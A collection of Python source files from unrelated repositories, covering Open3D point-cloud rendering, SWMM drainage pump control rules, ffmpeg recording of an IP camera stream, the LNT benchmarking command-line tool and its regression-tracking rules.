pcd = o3d.geometry.PointCloud(vector)
#o3d.visualization.draw_geometries([pcd])
yellow = rendering.MaterialRecord()
yellow.base_color = [1.0, 0.75, 0.0, 1.0]
yellow.shader = "defaultLit"
render.scene.add_geometry("pcd", pcd, yellow)
# Optionally set the camera field of view (to zoom in a bit)
vertical_field_of_view = 15.0 # between 5 and 90 degrees
aspect_ratio = frame_width / frame_height # azimuth over elevation
near_plane = 0.1
far_plane = 150
fov_type = o3d.visualization.rendering.Camera.FovType.Vertical
render.scene.camera.set_projection(vertical_field_of_view, aspect_ratio, near_plane, far_plane, fov_type)
# Look at the origin from the front (along the -Z direction, into the screen), with Y as Up.
center = [0, 0, 0] # look_at target
eye = [0, 0, 80] # camera position
up = [0, 1, 0] # camera orientation
render.scene.camera.look_at(center, eye, up)
render.scene.set_background([0, 0, 0, 0])
img = render.render_to_image()
return img
except Exception as e:
print(e)
``` |
{
"source": "jobvanderwerf/TUDelft_ENVM1601",
"score": 3
} |
#### File: TUDelft_ENVM1601/Operation_and_Control/ENVM1601_Heuristics.py
```python
import pyswmm
import numpy as np
import pandas as pd
import os
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib as mpl
class HeuristicRTC():
"""
Heuristic RTC is a python class used in the course
ENVM1601 for the MSc Environmental Engineering at the Delft
University of Technology. This code is meant to aid students in their
initial experience with Real Time Control of Urban Drainage Systems.
This code relies heavily on the EPA SWMM5 Python wrapper "pyswmm",
developed and maintained by <NAME>:
https://doi.org/10.21105/joss.02292
"""
def __init__(self,
model_directory=None,
model_name=None,
):
"""
The initialisation of the model run. Most of the code below is to
ensure that there is a correct link to a SWMM model.
Parameters
----------
model_directory : TYPE, str
Takes the directory of the SWMM model to be used.
The default is None.
model_name : TYPE, str
Takes the name of the inputfile (including the '.inp' extension).
The default is None.
Returns
-------
None.
"""
if model_name == None:
if model_directory == None:
mn = [i for i in os.listdir() if '.inp' in i]
assert len(mn) == 1, ('Zero or Multiple input files found ' +
'in target directory, specify the ' +
'desired inp file')
self.model_path = mn[0]
else:
mn = [i for i in os.listdir(model_directory) if 'inp' in i]
assert len(mn) == 1, ('Zero or Multiple input files found ' +
'in given target directory,' +
' specify the desired inp file')
self.model_path = model_directory + '\\' + mn[0]
else:
if model_directory == None:
assert os.path.isfile(model_name), ('The given "model_name"' +
'is not found, ' +
'ensure the name contains'+
' .inp and exists in ' +
os.getcwd())
self.model_path = model_name
else:
assert os.path.isfile(model_directory +
'\\' +
model_name), ('The given "model_name"' +
'is not found, ' +
'ensure the name contains'+
' .inp and exists in ' +
model_directory)
self.model_path = model_directory + '\\' + model_name
def run_model(self, rule_dictionary):
"""
Parameters
----------
rule_dictionary : DICT
"rule dictionary" contains the rules which are used for
controlling the catchment. The translation form takes a list
of rules per actuator. These lists contain lists of the rules in
the form of :
1. The node that the rule is based on
2. The level that node needs to above or below to change the
rule
3. The set point for the relevant pump where:
0 = OFF
1 = ON (Full capacity as per the pump curve)
any value between 0-1 for the percentage utilised
4. "higher" or "lower", to determine if the rule is about being
higher or lower than the given treshold
example:
rule_dictionary = {'p10_1': [['j_10', 0.2, 1, 'higher'],
['j_10', 0.2, 0, 'lower']],
'p_2_1':[['j_2', 0.5, 1, 'higher'],
['j_2', 0.2, 0, 'lower'],
['j_2', 1.5, 0.5, 'higher']],
'p_20_2': [['j_20', 0.3, 1, 'higher'],
['j_20', 0.2, 0, 'lower']],
'p_21_2': [['j_21', 0.3, 1, 'higher'],
['j_21', 0.2, 0, 'lower']],
'CSO_Pump_2': [['j_2', 2.6, 1, 'higher'],
['j_2', 2.3, 0, 'lower']],
'CSO_Pump_21': [['j_21', 1, 1, 'higher'],
['j_21', 0.8, 0, 'lower']],
'WWTP_inlet': [['j_10', 0.3, 1, 'higher'],
['j_10', 0.1, 0, 'lower']]}
Returns
-------
DataFrame
A pandas dataframe with the outfall recorded for each of
the outfalls in the model.
"""
assert isinstance(rule_dictionary, dict), ('Ensure that the rules ' +
'specified are in a ' +
'dictionary format')
assert isinstance(list(rule_dictionary.values())[0],
list), ('The dictionary entries should be a -list-' +
' of conditions, not a ' + '%s' %
type(list(rule_dictionary.values())[0]))
with pyswmm.Simulation(self.model_path) as sim:
links_model = pyswmm.Links(sim) #initialise the link connections
nodes_model = pyswmm.Nodes(sim) #initlialise the node connections
system_routing = pyswmm.SystemStats(sim) #enable getting the stats
sim.step_advance(900) #the system can only change every 15min
self.list_of_pumps = [i.linkid for i in
links_model if i.is_pump()] #makes a list of
#all the pumps available in the system that should be controlled
self.list_of_outfalls = [i.nodeid for i in nodes_model
if i.is_outfall()]
#lists all the outfall in the system
self.outfall_results = [[] for i in self.list_of_outfalls]
#initialises a list of lists where the results can be stored during
#the run
self.times = [] #idem as above but for the time
for step in sim:
for pump in self.list_of_pumps:
try: #the try construction is to catch if the pump is not
#specified, to give a more accurate error
for rule in rule_dictionary[pump]:
## IMPLEMENTATION OF THE RULES ##
if 'higher' in [d.lower() for d in
rule if isinstance(d, str)]:
#means the rules is activated if > threshold
if nodes_model[rule[0]].depth > rule[1]:
links_model[pump].target_setting = rule[2]
elif 'lower' in [d.lower() for d in
rule if isinstance(d, str)]:
if nodes_model[rule[0]].depth <= rule[1]:
links_model[pump].target_setting = rule[2]
except:
return AttributeError('Pump ' + pump +
' Not Specified in Rules,' +
' please add')
## GETTING THE INFLOW TO THE OUTFALLS AT EACH TIMESTEP ##
for i, outfall in enumerate(self.list_of_outfalls):
self.outfall_results[i].\
append(nodes_model[outfall].total_inflow)
self.times.append(sim.current_time)
print("Final Routing Error:", "%s" %
"{:0.2f}".format(float(system_routing.\
routing_stats['routing_error'])/100)+
"%\n" + "Flooding Volume:",
"%s" %
system_routing.routing_stats['flooding'])
## TRANSLATING THE OUTFALL DATA TO
self.outfall_output = pd.DataFrame(self.outfall_results)
self.outfall_output = self.outfall_output.transpose()
self.outfall_output.columns=self.list_of_outfalls
return self.outfall_output
def interpret_results(self, plotting=False):
"""
Parameters
----------
plotting : TYPE, optional
DESCRIPTION. The default is False.
Set to TRUE if you want the function to output a plotted overview
of the outfalls
Returns
-------
Series
Total loading per outfall as recorded in the model run.
This might deviate from the .rpt loading summary. This is because
the rpt is the sum from every computed timestep
rather than recorded and therefore the interpolation used
might affect the load.
Consider the rpt file as more accurate
"""
mft = mdates.DateFormatter("%Y-%m-%d\n%H:%M")
if plotting == False:
return self.outfall_output.sum()
else:
max_inflow = np.max(self.outfall_results)
## DOWN HERE MAKES THE PLOT ##
fig, ax = plt.subplots(4, 2, figsize=(10, 5))
mpl.rcParams['figure.titlesize'] = 18
for i, c in enumerate(self.outfall_output.columns):
if i > 3:
loc = (i-4, 1)
else:
loc = (i, 0)
ax[loc[0], loc[1]].plot(self.times, self.outfall_output[c])
if np.max(self.outfall_output[c]) == 0:
ax[loc[0], loc[1]].text(self.times[int(len(self.times)/2)],
max_inflow/2,
'No Outfall Recorded',
horizontalalignment='center',
verticalalignment='center')
if 'cso' in c:
ax[loc[0], loc[1]].set(title='Total Flow To: ' + c.upper(),
ylim=[0, max_inflow*1.1])
else:
ax[loc[0], loc[1]].set(title='Total Flow To: ' + c,
ylim=[0, max_inflow*1.1])
if loc[0] == 3 or loc[0] == 7:
ax[loc[0], loc[1]].set(xticks=[self.times[int(i)] for i in
[0,
np.floor(len(self.times)/4),
np.floor(len(self.times)/2),
np.floor(3*len(self.times)
/4),
len(self.times)-1]])
ax[loc[0], loc[1]].xaxis.set_major_formatter(mft)
else:
ax[loc[0], loc[1]].set(xticks=[])
fig.suptitle('Overview of Total Inflow all Outfalls')
fig.add_subplot(111, frameon=False)
plt.tick_params(labelcolor='none', which='both', top=False,
bottom=False,left=False,right=False)
plt.ylabel('Inflow Per Outfall ($m^3/s$)')
fig.tight_layout()
return self.outfall_output.sum()
``` |
{
"source": "job-van-schipstal/video_store_service",
"score": 3
} |
#### File: video_store_service/video_store_service/record.py
```python
import subprocess, os, requests, logging
from threading import Thread
from time import sleep
from typing import List, Tuple, Dict, Any
from video_store_service import apiclient
# Recording may take at most 15 times the supposed recording duration
timeout_multiplier = 15
#Video folder
video_folder = 'videos'
#test_filename
test_filename = 'test.mp4'
def data_streamer_thread(ffmpeg: subprocess.Popen, request: requests.Response):
"""
While ffmpeg is running, reads data from Response class (the camera) and writes it to ffmpeg
:param ffmpeg: ffmpeg process
:param request: request class with video stream
:return: nothing
"""
for data in request.iter_content(chunk_size=None, decode_unicode=False):
# #if ffmpeg is done, we are too
if (ffmpeg.poll() is not None):
print('ffmpeg returned {ffmpeg.returncode()}')
break
try:
ffmpeg.stdin.write(data)
# Either ffmpeg crashed, or it wants no more data, stop sending either way
except BrokenPipeError:
break
def get_ffmpeg_command(file_name: str,
video_config: Dict[str, Any]) -> List[str]:
"""
Generates list
used by Popen to start ffmpeg
:param file_name: name of the output file (with file extension)
:param video_config: Dict with video configuration options
:return: List with ffmpeg and its command line parameters
"""
# Main cmd
cmd = ['ffmpeg']
# Add input framerate if defined
if video_config.get('framerate', 'auto') != 'auto':
cmd.append('-r'); cmd.append(str(video_config.get('framerate', 30)))
# Add pipe input and recording duration
cmd.append('-i'); cmd.append('pipe:0')
cmd.append('-t'); cmd.append(str(video_config.get('duration', 10)))
# If not debug, decrease ffmpeg verbosity to warning and up
if not video_config.get('debug_info', False):
cmd.append('-hide_banner')
cmd.append('-loglevel'); cmd.append('warning')
# If recoding, add libx264 video codec with fast encoding present
if video_config.get('recode', True):
cmd.append('-c:v'); cmd.append('libx264')
cmd.append('-preset'); cmd.append('ultrafast')
# Add output filename
cmd.append('-an'); cmd.append(str(file_name))
logging.debug(cmd)
return cmd
def run_ffmpeg_and_record(cmd: List[str],
duration: int,
access: requests.Response) -> Tuple[bool, str]:
"""
Function that starts the recording
Creates an instance of ffmpeg with the cmd it has been given
Spawns a thread that will pipe the video stream to ffmpeg
monitors that ffmpeg closes before duration * timeout_multiplier
Kills it if it doesn't
:param cmd: list of ffmpeg and its command line parameters
:param duration: int duration of recording, to determine timeout
:param access: reponse object with active connection to IP camera
Will be used to pipe the video stream to ffmpeg
:return: Tuple[boolean success, string message]
"""
logging.debug('Start FFmpeg')
ffmpeg = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=None,
stderr=None,
cwd=os.path.join(os.getcwd(), video_folder))
logging.debug('Start streaming recieved data to ffmpeg')
stream_thread = Thread(name='data_stream_thread',
target=data_streamer_thread,
args=(ffmpeg, access))
stream_thread.start()
### Wrapup safety code ###
# Recording may take at most duration * timeout_multiplier seconds
for i in range(1, duration * timeout_multiplier):
# If ffmpeg is done, return
if ffmpeg.poll() is not None:
return True, f'FFMPEG finished successfully in about {i} seconds'
# else wait
sleep(1)
# Force terminate if not done
if ffmpeg.poll() is not None:
logging.warning('Force FFMPEG termination')
ffmpeg.terminate()
sleep(1)
if ffmpeg.poll() is not None:
ffmpeg.kill()
return False, f'FFMPEG required forcefull termination'
logging.debug('Done!')
return True, f'FFMPEG stopped at the last minute'
class FFMPEGRecorder():
"""
Class for recording videostream with ffmpeg
"""
def __init__(self, config: Dict[str, Any], client: apiclient.Client):
"""
:param config: Dict with configuration options
:param client: Apiclient class instance to get the video stream from
"""
self.__config = config
self.__client = client
def record(self, file_name: str) -> Tuple[bool, str]:
"""
:param file_name: file_name of output file (with file extension)
:return: Tuple[success: bool, message: str]
"""
# Get webaccess to camera
access = self.__client.get_webaccess_connection(self.__config['camera'])
# Record using ffmpeg
cmd = get_ffmpeg_command(file_name, self.__config['video'])
return run_ffmpeg_and_record(cmd, self.__config['video'].get('duration'), access)
def do_test_run(self) -> bool:
"""
Records from IP camera without being triggered by a webhook
Ensures there is a subfolder Video's
Removes the previous test file if it is still there
Usefull to test if you configured the recording properly
:return: success: bool
"""
# Make folder if it isn't there yet
folder = os.path.join(os.getcwd(), 'videos')
os.makedirs(folder, exist_ok=True)
# Remove previous test video file
video_file = os.path.join(folder, test_filename)
if os.path.isfile(video_file):
os.unlink(video_file)
# Test recording
logging.info('Testing recording')
result = self.record(test_filename)
if result[0]:
logging.info('recording was successful, saved file in folder '
'%s, with name %s', video_folder, test_filename)
return True
logging.info('recording failed with message: %s', result[1])
return False
``` |
{
"source": "jobvdl1997/llvm-lnt",
"score": 2
} |
#### File: lnt/lnttool/main.py
```python
from __future__ import print_function
from .common import init_logger
from .common import submit_options
from .convert import action_convert
from .create import action_create
from .import_data import action_import
from .import_report import action_importreport
from .updatedb import action_updatedb
from .viewcomparison import action_view_comparison
from .admin import group_admin
from lnt.util import logger
import click
import logging
import sys
@click.command("runserver", short_help="start a new development server")
@click.argument("instance_path", type=click.UNPROCESSED)
@click.option("--hostname", default="localhost", show_default=True,
help="host interface to use")
@click.option("--port", default=8000, show_default=True,
help="local port to use")
@click.option("--reloader", is_flag=True, help="use WSGI reload monitor")
@click.option("--debugger", is_flag=True, help="use WSGI debugger")
@click.option("--profiler", is_flag=True, help="use WSGI profiler")
@click.option("--profiler-file", help="file to dump profile info to")
@click.option("--profiler-dir",
help="pstat.Stats files are saved to this directory ")
@click.option("--shell", is_flag=True, help="load in shell")
@click.option("--show-sql", is_flag=True, help="show all SQL queries")
@click.option("--threaded", is_flag=True, help="use a threaded server")
@click.option("--processes", default=1, show_default=True,
help="number of processes to use")
def action_runserver(instance_path, hostname, port, reloader, debugger,
profiler, profiler_file, profiler_dir, shell, show_sql,
threaded, processes):
"""start a new development server
\b
Start the LNT server using a development WSGI server. Additional options can be
used to control the server host and port, as well as useful development
features such as automatic reloading.
The command has built-in support for running the server on an instance which
has been packed into a (compressed) tarball. The tarball will be automatically
unpacked into a temporary directory and removed on exit. This is useful for
passing database instances back and forth, when others only need to be able to
view the results.
"""
import lnt.server.ui.app
import os
init_logger(logging.INFO, show_sql=show_sql)
app = lnt.server.ui.app.App.create_standalone(instance_path,)
if debugger:
app.debug = True
if profiler:
import werkzeug.contrib.profiler
if profiler_dir:
if not os.path.isdir(profiler_dir):
os.mkdir(profiler_dir)
app.wsgi_app = werkzeug.contrib.profiler.ProfilerMiddleware(
app.wsgi_app, stream=open(profiler_file, 'w'),
profile_dir=profiler_dir)
if shell:
from flask import current_app
from flask import g
import code
ctx = app.test_request_context()
ctx.push()
vars = globals().copy()
vars.update(locals())
shell = code.InteractiveConsole(vars)
shell.interact()
else:
app.run(hostname, port,
use_reloader=reloader,
use_debugger=debugger,
threaded=threaded,
processes=processes)
@click.command("checkformat")
@click.argument("files", nargs=-1, type=click.Path(exists=True))
@click.option("--testsuite", "-s", default='nts')
def action_checkformat(files, testsuite):
"""check the format of LNT test report files"""
import lnt.server.config
import lnt.server.db.v4db
import lnt.util.ImportData
db = lnt.server.db.v4db.V4DB('sqlite:///:memory:',
lnt.server.config.Config.dummy_instance())
session = db.make_session()
for file in files:
result = lnt.util.ImportData.import_and_report(
None, None, db, session, file, '<auto>', testsuite)
lnt.util.ImportData.print_report_result(result, sys.stdout,
sys.stderr, verbose=True)
@click.command("check-no-errors")
@click.argument("files", nargs=-1, type=click.Path(exists=True))
def action_check_no_errors(files):
'''Check that report contains "no_error": true.'''
import json
error_msg = None
for file in files:
try:
data = json.load(open(file))
except Exception as e:
error_msg = 'Could not read report: %s' % e
break
# Get 'run' or 'Run' { 'Info' } section (old/new format)
run_info = data.get('run', None)
if run_info is None:
run_info = data.get('Run', None)
if run_info is not None:
run_info = run_info.get('Info', None)
if run_info is None:
error_msg = 'Could not find run section'
break
no_errors = run_info.get('no_errors', False)
if no_errors is not True and no_errors != "True":
error_msg = 'run section does not specify "no_errors": true'
break
if error_msg is not None:
sys.stderr.write("%s: %s\n" % (file, error_msg))
sys.exit(1)
def _print_result_url(results, verbose):
result_url = results.get('result_url')
if result_url is not None:
if verbose:
print("Results available at:", result_url)
else:
print(result_url)
elif verbose:
print("Results available at: no URL available")
class RunTestCLI(click.MultiCommand):
def list_commands(self, ctx):
import lnt.tests
return lnt.tests.get_names()
def get_command(self, ctx, name):
import lnt.tests
try:
return lnt.tests.get_module(name).cli_action
except KeyError:
return None
@click.group("runtest", cls=RunTestCLI, context_settings=dict(
ignore_unknown_options=True, allow_extra_args=True,))
def group_runtest():
"""run a builtin test application"""
init_logger(logging.INFO)
@click.command("showtests")
def action_showtests():
"""show the available built-in tests"""
import lnt.tests
import inspect
print('Available tests:')
test_names = lnt.tests.get_names()
max_name = max(map(len, test_names))
for name in test_names:
test_module = lnt.tests.get_module(name)
description = inspect.cleandoc(test_module.__doc__)
print(' %-*s - %s' % (max_name, name, description))
@click.command("submit")
@click.argument("url")
@click.argument("files", nargs=-1, type=click.Path(exists=True), required=True)
@submit_options
@click.option("--verbose", "-v", is_flag=True,
help="show verbose test results")
def action_submit(url, files, select_machine, merge, verbose):
"""submit a test report to the server"""
from lnt.util import ServerUtil
import lnt.util.ImportData
results = ServerUtil.submitFiles(url, files, verbose,
select_machine=select_machine,
merge_run=merge)
for submitted_file in results:
if verbose:
lnt.util.ImportData.print_report_result(
submitted_file, sys.stdout, sys.stderr, True)
_print_result_url(submitted_file, verbose)
if len(files) != len(results):
sys.exit(1)
@click.command("send-daily-report")
@click.argument("instance_path", type=click.UNPROCESSED)
@click.argument("address")
@click.option("--database", default="default", show_default=True,
help="database to use")
@click.option("--testsuite", default="nts", show_default=True,
help="testsuite to use")
@click.option("--host", default="localhost", show_default=True,
help="email relay host to use")
@click.option("--from", "from_address", default=None, required=True,
help="from email address")
@click.option("--today", is_flag=True,
help="send the report for today (instead of most recent)")
@click.option("--subject-prefix", help="add a subject prefix")
@click.option("--dry-run", is_flag=True, help="don't actually send email")
@click.option("--days", default=3, show_default=True,
help="number of days to show in report")
@click.option("--filter-machine-regex",
help="only show machines that contain the regex")
def action_send_daily_report(instance_path, address, database, testsuite, host,
from_address, today, subject_prefix, dry_run,
days, filter_machine_regex):
"""send a daily report email"""
import contextlib
import datetime
import email.mime.multipart
import email.mime.text
import lnt.server.reporting.dailyreport
import smtplib
# Load the LNT instance.
instance = lnt.server.instance.Instance.frompath(instance_path)
config = instance.config
# Get the database.
with contextlib.closing(config.get_database(database)) as db:
session = db.make_session()
# Get the testsuite.
ts = db.testsuite[testsuite]
if today:
date = datetime.datetime.utcnow()
else:
# Get a timestamp to use to derive the daily report to generate.
latest = session.query(ts.Run).\
order_by(ts.Run.start_time.desc()).limit(1).first()
# If we found a run, use its start time (rounded up to the next
# hour, so we make sure it gets included).
if latest:
date = latest.start_time + datetime.timedelta(hours=1)
else:
# Otherwise, just use now.
date = datetime.datetime.utcnow()
# Generate the daily report.
logger.info("building report data...")
report = lnt.server.reporting.dailyreport.DailyReport(
ts, year=date.year, month=date.month, day=date.day,
day_start_offset_hours=date.hour, for_mail=True,
num_prior_days_to_include=days,
filter_machine_regex=filter_machine_regex)
report.build(session)
logger.info("generating HTML report...")
ts_url = "%s/db_%s/v4/%s" \
% (config.zorgURL, database, testsuite)
subject = "Daily Report: %04d-%02d-%02d" % (
report.year, report.month, report.day)
html_report = report.render(ts_url, only_html_body=False)
utf8_html_report = html_report.encode('utf-8')
if subject_prefix is not None:
subject = "%s %s" % (subject_prefix, subject)
# Form the multipart email message.
msg = email.mime.multipart.MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = from_address
msg['To'] = address
msg.attach(email.mime.text.MIMEText(utf8_html_report, 'html', 'utf-8'))
# Send the report.
if not dry_run:
s = smtplib.SMTP(host)
s.sendmail(from_address, [address],
msg.as_string())
s.quit()
else:
out = sys.stdout
out.write("From: %s\n" % msg['From'])
out.write("To: %s\n" % msg['To'])
out.write("Subject: %s\n" % msg['Subject'])
out.write("=== html report\n")
out.write(html_report + "\n")
@click.command("send-run-comparison")
@click.argument("instance_path", type=click.UNPROCESSED)
@click.argument("run_a_id")
@click.argument("run_b_id")
@click.option("--database", default="default", show_default=True,
help="database to use")
@click.option("--testsuite", default="nts", show_default=True,
help="testsuite to use")
@click.option("--host", default="localhost", show_default=True,
help="email relay host to use")
@click.option("--from", "from_address", default=None, required=True,
help="from email address")
@click.option("--to", "to_address", default=None, required=True,
help="to email address")
@click.option("--subject-prefix", help="add a subject prefix")
@click.option("--dry-run", is_flag=True, help="don't actually send email")
def action_send_run_comparison(instance_path, run_a_id, run_b_id, database,
testsuite, host, from_address, to_address,
subject_prefix, dry_run):
"""send a run-vs-run comparison email"""
import contextlib
import email.mime.multipart
import email.mime.text
import lnt.server.reporting.dailyreport
import smtplib
init_logger(logging.ERROR)
# Load the LNT instance.
instance = lnt.server.instance.Instance.frompath(instance_path)
config = instance.config
# Get the database.
with contextlib.closing(config.get_database(database)) as db:
session = db.make_session()
# Get the testsuite.
ts = db.testsuite[testsuite]
# Lookup the two runs.
run_a_id = int(run_a_id)
run_b_id = int(run_b_id)
run_a = session.query(ts.Run).\
filter_by(id=run_a_id).first()
run_b = session.query(ts.Run).\
filter_by(id=run_b_id).first()
if run_a is None:
logger.error("invalid run ID %r (not in database)" % (run_a_id,))
if run_b is None:
logger.error("invalid run ID %r (not in database)" % (run_b_id,))
# Generate the report.
data = lnt.server.reporting.runs.generate_run_data(
session, run_b, baseurl=config.zorgURL, result=None,
compare_to=run_a, baseline=None, aggregation_fn=min)
env = lnt.server.ui.app.create_jinja_environment()
text_template = env.get_template('reporting/run_report.txt')
text_report = text_template.render(data)
utf8_text_report = text_report.encode('utf-8')
html_template = env.get_template('reporting/run_report.html')
html_report = html_template.render(data)
utf8_html_report = html_report.encode('utf-8')
subject = data['subject']
if subject_prefix is not None:
subject = "%s %s" % (subject_prefix, subject)
# Form the multipart email message.
msg = email.mime.multipart.MIMEMultipart('alternative')
msg['Subject'] = subject
msg['From'] = from_address
msg['To'] = to_address
msg.attach(email.mime.text.MIMEText(utf8_text_report, 'plain', 'utf-8'))
msg.attach(email.mime.text.MIMEText(utf8_html_report, 'html', 'utf-8'))
# Send the report.
if not dry_run:
mail_client = smtplib.SMTP(host)
mail_client.sendmail(
from_address,
[to_address],
msg.as_string())
mail_client.quit()
else:
out = sys.stdout
out.write("From: %s\n" % from_address)
out.write("To: %s\n" % to_address)
out.write("Subject: %s\n" % subject)
out.write("=== text/plain report\n")
out.write(text_report + "\n")
out.write("=== html report\n")
out.write(html_report + "\n")
@click.group("profile")
def action_profile():
"""tools to extract information from profiles"""
return
@action_profile.command("upgrade")
@click.argument("input", type=click.Path(exists=True))
@click.argument("output", type=click.Path())
def command_update(input, output):
"""upgrade a profile to the latest version"""
import lnt.testing.profile.profile as profile
profile.Profile.fromFile(input).upgrade().save(filename=output)
@action_profile.command("getVersion")
@click.argument("input", type=click.Path(exists=True))
def command_get_version(input):
"""print the version of a profile"""
import lnt.testing.profile.profile as profile
print(profile.Profile.fromFile(input).getVersion())
@action_profile.command("getTopLevelCounters")
@click.argument("input", type=click.Path(exists=True))
def command_top_level_counters(input):
"""print the whole-profile counter values"""
import json
import lnt.testing.profile.profile as profile
print(json.dumps(profile.Profile.fromFile(input).getTopLevelCounters()))
@action_profile.command("getFunctions")
@click.argument("input", type=click.Path(exists=True))
@click.option("--sortkeys", is_flag=True)
def command_get_functions(input, sortkeys):
"""print the functions in a profile"""
import json
import lnt.testing.profile.profile as profile
print(json.dumps(profile.Profile.fromFile(input).getFunctions(),
sort_keys=sortkeys))
@action_profile.command("getCodeForFunction")
@click.argument("input", type=click.Path(exists=True))
@click.argument('fn')
def command_code_for_function(input, fn):
"""print the code/instruction for a function"""
import json
import lnt.testing.profile.profile as profile
print(json.dumps(
list(profile.Profile.fromFile(input).getCodeForFunction(fn))))
def _version_check():
"""
Check that the installed version of the LNT is up-to-date with the running
package.
This check is used to force users of distribute's develop mode to reinstall
when the version number changes (which may involve changing package
requirements).
"""
import pkg_resources
import lnt
# Get the current distribution.
installed_dist = pkg_resources.get_distribution("LNT")
installed_dist_name = "%s %s" % (installed_dist.project_name,
installed_dist.version)
current_dist_name = "LNT %s" % (lnt.__version__,)
if pkg_resources.parse_version(installed_dist_name) != \
pkg_resources.parse_version(current_dist_name):
raise SystemExit("""\
error: installed distribution %s is not current (%s), you may need to reinstall
LNT or rerun 'setup.py develop' if using development mode.""" % (
installed_dist_name, current_dist_name))
def show_version(ctx, param, value):
"""print LNT version"""
import lnt
if not value or ctx.resilient_parsing:
return
if lnt.__version__:
print("LNT %s" % (lnt.__version__, ))
ctx.exit()
@click.group(invoke_without_command=True, no_args_is_help=True)
@click.option('--version', is_flag=True, callback=show_version,
expose_value=False, is_eager=True, help=show_version.__doc__)
def main():
"""LNT command line tool
\b
Use ``lnt <command> --help`` for more information on a specific command.
"""
_version_check()
main.add_command(action_check_no_errors)
main.add_command(action_checkformat)
main.add_command(action_convert)
main.add_command(action_create)
main.add_command(action_import)
main.add_command(action_importreport)
main.add_command(action_profile)
main.add_command(action_runserver)
main.add_command(action_send_daily_report)
main.add_command(action_send_run_comparison)
main.add_command(action_showtests)
main.add_command(action_submit)
main.add_command(action_updatedb)
main.add_command(action_view_comparison)
main.add_command(group_admin)
main.add_command(group_runtest)
if __name__ == '__main__':
main()
```
#### File: db/rules/rule_update_fixed_regressions.py
```python
from sqlalchemy.orm.session import Session
from typing import Dict # noqa: flake8 does not detect use in comments
from lnt.server.db.regression import RegressionState
from lnt.server.db.regression import get_cr_for_field_change, get_ris
from lnt.server.db.testsuitedb import TestSuiteDB
from lnt.testing.util.commands import timed
from lnt.util import logger
from lnt.server.reporting.analysis import MIN_PERCENTAGE_CHANGE
def _fixed_rind(session, ts, rind):
"""Is this regression indicator fixed?"""
fc = rind.field_change
if fc is None:
return False
current_cr, _, _ = get_cr_for_field_change(session, ts, fc, current=True)
if current_cr.pct_delta < MIN_PERCENTAGE_CHANGE:
return True
else:
return False
def is_fixed(session, ts, regression):
"""Comparing the current value to the regression, is this regression now
fixed?
"""
r_inds = get_ris(session, ts, regression.id)
fixes = (_fixed_rind(session, ts, x) for x in r_inds)
return all(fixes)
def impacts(session, ts, run_id, regression):
# type: (Session, TestSuiteDB, int, TestSuiteDB.Regression) -> bool
"""Does this run have a chance of impacting this regression?
This is just to prevent doing a full comparison, so we don't have
to be toally accurate. For now, compare machines."""
machine_id = session.query(ts.Run.machine_id).filter(ts.Run.id == run_id).scalar()
regression_machines = [x[0] for x in session.query(ts.FieldChange.machine_id)
.join(ts.RegressionIndicator)
.filter(ts.RegressionIndicator.regression_id == regression.id)
.all()]
regression_machines_set = set(regression_machines)
return machine_id in regression_machines_set
def age_out_oldest_regressions(session, ts, num_to_keep=50):
# type: (Session, TestSuiteDB, int) -> int
"""Find the oldest regressions that are still in the detected state,
and age them out. This is needed when regressions are not manually
acknowledged, regression analysis can grow unbounded.
:param session: db session
:param ts: testsuite
:param num_to_keep: the number of newest regressions to keep in the detected state.
:returns: the number of regressions changed.
"""
regression_orders = session.query(ts.Regression.id, ts.FieldChange.end_order_id) \
.filter(ts.Regression.state == RegressionState.DETECTED) \
.join(ts.RegressionIndicator, ts.Regression.id == ts.RegressionIndicator.regression_id) \
.join(ts.FieldChange) \
.all()
regression_newest_change = {} # type: Dict[int, int]
for regression_id, order_id in regression_orders:
current = regression_newest_change.get(regression_id)
if current is None or current < order_id:
regression_newest_change[regression_id] = order_id
# Order regressions by FC end order.
ordered = sorted(regression_newest_change.items(), key=lambda x: x[1])
to_move = ordered[0:(-1 * num_to_keep)]
for r, _ in to_move:
regress = session.query(ts.Regression).filter_by(id=r).one()
logger.info("Ageing out regression {} to keep regression count under {}."
.format(regress, num_to_keep))
regress.state = RegressionState.IGNORED
return len(to_move)
@timed
def regression_evolution(session, ts, run_id):
"""Analyse regressions. If they have changes, process them.
Look at each regression in state detect. Move to ignore if it is fixed.
Look at each regression in state stage. Move to verify if fixed.
Look at regressions in detect, do they match our policy? If no, move to
NTBF.
"""
logger.info("Running regression evolution")
# Clear the cache before we start.
ts.machine_to_latest_order_cache = {}
changed = 0
evolve_states = [RegressionState.DETECTED, RegressionState.STAGED,
RegressionState.ACTIVE]
regressions = session.query(ts.Regression) \
.filter(ts.Regression.state.in_(evolve_states)) \
.all()
detects = [r for r in regressions if r.state == RegressionState.DETECTED]
staged = [r for r in regressions if r.state == RegressionState.STAGED]
active = [r for r in regressions if r.state == RegressionState.ACTIVE]
# Remove the oldest detected regressions if needed.
num_regression_to_keep = 50
if len(detects) > num_regression_to_keep:
changed += age_out_oldest_regressions(session, ts, num_regression_to_keep)
for regression in detects:
if impacts(session, ts, run_id, regression) and is_fixed(session, ts, regression):
logger.info("Detected fixed regression" + str(regression))
regression.state = RegressionState.IGNORED
regression.title = regression.title + " [Detected Fixed]"
changed += 1
for regression in staged:
if impacts(session, ts, run_id, regression) and is_fixed(session, ts, regression):
logger.info("Staged fixed regression" + str(regression))
regression.state = RegressionState.DETECTED_FIXED
regression.title = regression.title + " [Detected Fixed]"
changed += 1
for regression in active:
if impacts(session, ts, run_id, regression) and is_fixed(session, ts, regression):
logger.info("Active fixed regression" + str(regression))
regression.state = RegressionState.DETECTED_FIXED
regression.title = regression.title + " [Detected Fixed]"
changed += 1
session.commit()
logger.info("Changed the state of {} regressions".format(changed))
post_submission_hook = regression_evolution
```
#### File: server/reporting/summaryreport.py
```python
import re
import lnt.testing
import lnt.util.stats
###
# Aggregation Function
class Aggregation(object):
def __init__(self):
self.is_initialized = False
def __repr__(self):
return repr(self.getvalue())
def getvalue(self):
abstract
def append(self, values):
if not self.is_initialized:
self.is_initialized = True
self._initialize(values)
self._append(values)
class Sum(Aggregation):
def __init__(self):
Aggregation.__init__(self)
self.sum = None
def getvalue(self):
return self.sum
def _initialize(self, values):
self.sum = [0.] * len(values)
def _append(self, values):
for i, value in enumerate(values):
self.sum[i] += value
class Mean(Aggregation):
def __init__(self):
Aggregation.__init__(self)
self.count = 0
self.sum = None
def getvalue(self):
return [value/self.count for value in self.sum]
